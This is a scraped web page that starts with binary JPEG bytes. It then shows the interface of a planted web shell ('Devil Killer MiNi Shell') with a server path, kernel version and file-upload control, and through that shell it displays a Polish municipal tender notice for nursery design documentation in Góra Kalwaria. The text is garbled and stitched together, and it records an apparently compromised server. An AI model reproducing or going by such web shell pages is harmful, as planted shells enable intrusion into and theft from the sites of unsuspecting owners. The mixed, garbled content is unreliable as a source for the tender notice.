JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20240515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20240515/0032572201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Żłobek w Górze Kalwarii program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 MALUCH + w ramach Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 Aktywny maluch 2022- 2029 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GÓRA KALWARIA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271134</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 3 Maja 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Góra Kalwaria</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gorakalwaria.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gorakalwaria.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Żłobek w Górze Kalwarii program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 MALUCH + w ramach Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 Aktywny maluch 2022- 2029 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8e3a532-12b6-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00325722</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00050173/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Żłobek w Górze Kalwarii - program rozwoju instytucji opieki nad dziecmi w wieku do lat 3 MALUCH + (dokumentacja)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 MALUCH +” w ramach „Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 Aktywny maluch 2022 - 2029” (dawniej MALUCH + 2022 – 2029) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gorakalwaria <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gorakalwaria</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/pn/gorakalwaria</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/gorakalwaria</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w Rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie osobowego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w SWZ. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w SWZ ), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZAP.271.12.2024.ASK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo – kosztorysowej wraz z uzyskaniem, w imieniu zamawiającego, pozwolenia na budowę żłobka w Górze Kalwarii dla zadania inwestycyjnego pn. „Żłobek w Górze Kalwarii w ramach „Programu <br/>rozwoju instytucji opieki nad dziećmi w wieku do lat 3 MALUCH + 2022 - 2029”, na działkach nr ew. 41/2, 41/4, 41/3, 40/2, 40/4, 40/3 obręb 13 – 02 jedn. ew. 141801_4 Góra Kalwaria.<br/>Dokumentacja projektowa musi:<br/>- spełniać standard architektoniczny, określony w załączniku nr 2 do Wytycznych dotyczących realizacji zasad równowartościowych w ramach funduszy unijnych na lata 2021 – 2027,<br/>- zapewniać dostępność osobom ze szczególnymi potrzebami poprzez stosowanie uniwersalnego projektowania lub racjonalnych usprawnień, zgodnie z przepisami ustawy z dnia 19 lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami (Dz.U. z 2022 r. poz. 2240),<br/>- spełniać standardy dotyczące wymagań lokalowych i sanitarnych dotyczących żłobków i klubów dziecięcych zgodnie z przepisami ustawy z dnia 4 lutego 2011 r. o opiece nad dziećmi w wieku do lat 3 oraz w aktach wykonawczych do tej ustawy.<br/>W ramach zamówienia zamawiający wymaga wykonania:<br/>1.	koncepcji lokalizacji żłobka, placu zabaw, drogi wewnętrznej i miejsc postojowych z uwzględnieniem rezerwy terenu pod ewentualną budowę szkoły na 400 uczniów z 4 oddziałami przedszkolnymi i z salą gimnastyczną o wymiarach boiska 12 x 24 m, boiska przyszkolnego i placu zabaw (dla szkoły).<br/>Koncepcję zagospodarowania terenu należy przedstawić zamawiającemu min. w 2 wariantach.<br/>2.	koncepcji żłobka uwzględniającą niżej wymienione założenia:<br/>- budynek parterowy o powierzchni zabudowy ok. 900 m2 i powierzchni użytkowej ok. 730 m2,<br/>- sześć sal pobytu dziennego (15 dzieci w sali po ok. 50 m2 każda),<br/>- dwa pomieszczenia dla matki z dzieckiem o pow. ok. 15 m2 każde,<br/>- dwa pomieszczenia wózkowni o pow. ok. 8 m2 każde,<br/>- jedno pomieszczenie socjalne o pow. ok. 15 m2, <br/> - jedna szatnia dla personelu o pow. ok. 10 m2,<br/>- sześć pomieszczeń na leżaki o pow. ok. 5 m2 każde,<br/>- sześć łazienek dla dzieci o pow. ok. 6 m2 każda,<br/>- wc dla personelu:<br/>•	jedno wc damskie o pow. ok. 3 m2,<br/>•	jedno wc męskie o pow. ok. 3 m2,<br/>- jedno pomieszczenie wc dla niepełnosprawnych o pow. ok. 7 m2,<br/>- jedno pomieszczenie wc dla pracowników kuchni o pow. ok. 5 m2,<br/>- sekretariat o pow. ok. 20 m2,<br/>- pokój dyrektora o pow. ok. 15 m2,<br/>- szatnia – dwa pomieszczenia o pow. ok. 30 m2 każde,<br/>- pomieszczenie gospodarcze o pow. ok. 5 m2,<br/>- pokój dla konserwatora o pow. ok. 10 m2,<br/>- pokój intendenta o pow. ok. 10 m2,<br/>- magazyn na środki czystości o pow. ok. 15 m2,<br/>- pralnia i brudownik o pow. ok. 15 m2,<br/>- kuchnia wraz z kuchnią mleczną oraz z zapleczem o łącznej pow. ok. 131 m2 w tym:<br/>•	magazyn urządzeń chłodniczych o pow. ok. 4 m2,<br/>•	magazyn produktów suchych o pow. ok. 4 m2,<br/>•	magazyn ogólny - ok. 8 m2,<br/>•	obieralnia - ok. 15 m2,<br/>•	pomieszczenie na odpadki - ok. 5 m2,<br/>•	zmywalnia - ok. 40 m2,<br/>•	kuchnia - ok. 50 m2,<br/>•	szatnia dla personelu kuchennego o pow. ok. 5 m2,<br/>- 20 miejsc parkingowych w tym 1 miejsce dla osób niepełnosprawnych o łącznej powierzchni ok. 170 m2,<br/>- placu zabaw o pow. ok. 200 m2,<br/>- droga wewnętrzna o szer. ok. 12 m na długości ok. 350 m,<br/>Koncepcję żłobka należy przedstawić zamawiającemu min. w 2 wariantach w terminie 60 dni od podpisania umowy.<br/>Każda z koncepcji powinna zawierać:<br/>- opis techniczny<br/>- projekt zagospodarowania terenu<br/>- wizualizację<br/>- wstępny kosztorys inwestorski.<br/><br/>Zamawiający dopuszcza budowę w technologii modułowej<br/><br/>Po zatwierdzeniu koncepcji przez zamawiającego należy:<br/>1.	zaprezentować przygotowane koncepcje na spotkaniu z radnymi i mieszkańcami<br/>2.	opracować dokumentację projektowo – kosztorysową na budowę żłobka na podstawie zaakceptowanej koncepcji<br/>3.	uzyskać, w imieniu zamawiającego, pozwolenie na budowę żłobka <br/><br/>Zakres dokumentacji do wykonania:<br/>1.	mapy do celów projektowych<br/>2.	projekty budowlane i techniczne:<br/>	opis techniczny całego zamierzenia budowlanego<br/>	dokumentację techniczną badań gruntu<br/>	projekt zagospodarowanie terenu<br/>	projekt architektoniczno - budowlany<br/>	projekt konstrukcji<br/>	projekty instalacji wewnętrznych w budynku <br/>	wod. – kan.<br/>	c.o. – sposób ogrzewania wg propozycji projektanta po wykonaniu analizy kosztów ogrzewania budynku dla dostępnych źródeł ogrzewania <br/>	elektryczną<br/>	wentylacja mechaniczna<br/>	klimatyzacja<br/>	teletechniczna zawierająca instalację telewizyjną, monitoring, sieć telefoniczną pomiędzy salami bez wyjścia na zewnątrz; wyjście na zewnątrz z sekretariatu i gabinetu dyrektora; sieć komputerową <br/>	odgromowa<br/>	gazowa <br/>	technologiczne<br/>	projekt instalacji zewnętrznej oświetlenia terenu<br/>	projekty sieci zewnętrznych i przyłączy: wod. – kan., kanalizacji deszczowej, energetycznej, gazowej, teletechnicznej<br/>	projekty dróg, miejsc postojowych, placów, chodników, zieleni, placu zabaw – teren przeznaczony do funkcjonowania żłobka z uwzględnieniem nawierzchni bezpiecznej i wyposażeniem placu zabaw<br/>	projekty aranżacji wnętrz pomieszczeń wraz z wyposażeniem i kolorystyką<br/>	projekt technologii kuchni, spełniający wymagania HACCP, uzgodniony przez rzeczoznawcę ds. Sanepid<br/>	projekty specjalistyczne związane ze specyfiką zamierzenia budowlanego<br/>	projekty detali architektonicznych<br/>	projekt kolorystyki elewacji<br/>4. specyfikacje techniczne wykonania i odbioru robót (branżami)<br/>5. przedmiary robót – każda branża wraz z wyposażeniem<br/>6. kosztorys inwestorski szczegółowy – każda branża wraz z wyposażeniem<br/>8. charakterystyka energetyczna obiektu<br/>9. zbiorcze zestawienie kosztów<br/>10. wszelkie wymagane uzgodnienia niezbędne do uzyskania pozwolenia na budowę<br/>11. pozwolenie na budowę.<br/>Uwaga:<br/>1.	Zamawiający wymaga od Wykonawcy prowadzenia dziennika korespondencji urzędowej, dotyczącej uzyskiwania wszelkich uzgodnień, decyzji administracyjnych itp., który będzie zawierał informacje dotyczące daty wystąpienia z wnioskiem oraz daty uzyskania odpowiedzi właściwego organu.<br/>2.	Dokumentacja w trakcie opracowania oraz przed oddaniem powinna być przedstawiana na radach technicznych organizowanych w siedzibie Zamawiającego co najmniej raz w miesiącu. Zamawiający dopuszcza rady budowy w trybie on – line. <br/>3.	Dokumentację projektową (projekt zagospodarowania terenu, projekt architektoniczno – budowlany, projekty techniczne) należy wykonać w 5 jednobrzmiących egzemplarzach w wersji papierowej oraz w wersji elektronicznej w programie ogólnodostępnym z rozszerzeniem .pdf. Projekty techniczne w 5 egz.<br/>Każdy komplet dokumentacji powinien być oddzielnie spakowany w pojemniki umożliwiające łatwe przenoszenie (z uchwytami), na opakowaniach czytelny spis załączników, wszystkie komplety i załączniki ponumerowane.<br/>Należy przewidzieć wykonanie dodatkowych egzemplarzy niezbędnych do uzyskania uzgodnień (np.: z eksploatatorem sieci energetycznej itp.).<br/>Przedmiar i szczegółowy kosztorys inwestorski z rozbiciem na poszczególne branże oraz etapy realizacyjne należy wykonać w 2 egz. w wersji papierowej oraz w wersji elektronicznej w formacie .ath i .pdf.<br/>Zbiorcze zestawienie kosztów - 2 egz.<br/>Specyfikacje techniczne wykonania i odbioru robót należy wykonać w 2 egz. w wersji papierowej oraz w wersji elektronicznej w formacie .pdf.<br/>W przypadku nanoszenia jakichkolwiek poprawek na etapie uzyskiwania pozwolenia na budowę lub zaświadczenia o nie wnoszeniu sprzeciwu wobec wykonania robót budowlanych poprawki te powinny być naniesione we wszystkich egzemplarzach dokumentacji projektowej w wersji papierowej i elektronicznej.<br/>Wersja elektroniczna ma dokładnie odpowiadać wersji papierowej, na co Wykonawca złoży stosowne oświadczenie. Wersję elektroniczną jako skan dokumentacji (pdf) należy wykonać po sprawdzeniu i zatwierdzeniu dokumentacji przez Gminę oraz uzyskaniu decyzji pozwolenia na budowę. Dokumentacja w formie elektronicznej powinna być czytelna przy zachowaniu jak najmniejszego rozmiaru plików. Maksymalny rozmiar pliku nie może być większy niż 10MB. Użyty format plików powinien umożliwiać wydruk rysunków w skali.<br/>Wersję elektroniczną opracowań należy dostarczyć na płycie CD lub innym nośniku– 1 egz.<br/><br/>4.	Projekty, kosztorysy i przedmiary należy opracować z uwzględnieniem Ustawy Prawo Zamówień Publicznych – rozwiązań technicznych nie można opisywać przez wskazanie np. znaków towarowych, patentów.<br/>W przypadku zastosowania jakiegokolwiek znaku towarowego w dokumentacji zarówno projektowej, jak i kosztorysowej, zamawiający wymaga przygotowania dokumentu zawierającego spis znaków towarowych oraz stron, na których się znajdują oraz przygotowania wykazu parametrów równoważności, które będą weryfikowane na etapie postępowania przetargowego<br/>5.	Zakres, treść i forma dokumentacji projektowo – kosztorysowej musi w szczególności zapewnić możliwość:<br/>- przeprowadzenia przetargu na roboty zgodnie z ustawą Prawo zamówień publicznych<br/>- uzyskania (bez dodatkowych projektów i opracowań) kompletnego – nadającego się do użytkowania zgodnie z przeznaczeniem obiektu<br/>- wydatkowania środków przeznaczonych na realizację i późniejszą eksploatację obiektu w sposób celowy i oszczędny, z zachowaniem zasady uzyskiwania najlepszych efektów z danych nakładów.<br/>6.	Wykonawca zobowiązany jest do nieodpłatnego:<br/>- uczestnictwa w przetargu na wykonanie robót poprzez udzielanie odpowiedzi do 3 dni roboczych na wszystkie pytania oferentów zgłoszone drogą e-mailową Wykonawcy przez Zamawiającego;<br/>- uzupełniania szczegółów dokumentacji projektowej oraz wyjaśniania wykonawcy robót wątpliwości powstałych w toku realizacji inwestycji<br/>- uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej zgłaszanych przez Zamawiającego.<br/>7.	Wymagana jest wizja w terenie w celu ustalenia warunków wykonywania robót.<br/><br/>KOD CPV 71.22.00.00-6<br/> 71.24.20.00-6 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>1. Cena - 60%<br/>2. Termin przedstawienia Koncepcji I - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin przedstawienia Koncepcji I</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	Zdolności do występowania w obrocie gospodarczym.<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>b)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/> o ile wynika to z odrębnych przepisów.<br/><br/>c)	Sytuacji ekonomicznej lub finansowej.<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>d)	Zdolności technicznej lub zawodowej. <br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności zawodowej, jeżeli wykaże, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia,<br/>tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 1 usługę, polegającą na opracowaniu min 1 dokumentacji projektowo – kosztorysowej wraz z uzyskaniem pozwolenia na budowę lub przebudowę lub rozbudowę budynku oświatowego za kwotę min. 50.000,00 zł brutto, który jest w trakcie budowy lub został zrealizowany w oparciu o wykonaną dokumentację. <br/><br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane warunki mogą być spełnione łącznie przez Wykonawców. Zamawiający nie precyzuje szczególnego sposobu spełniania warunków przez Wykonawców ubiegających się wspólnie<br/>o udzielenie zamówienia. <br/> <br/>2)	Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">•	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275) z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ;</span> </h3> 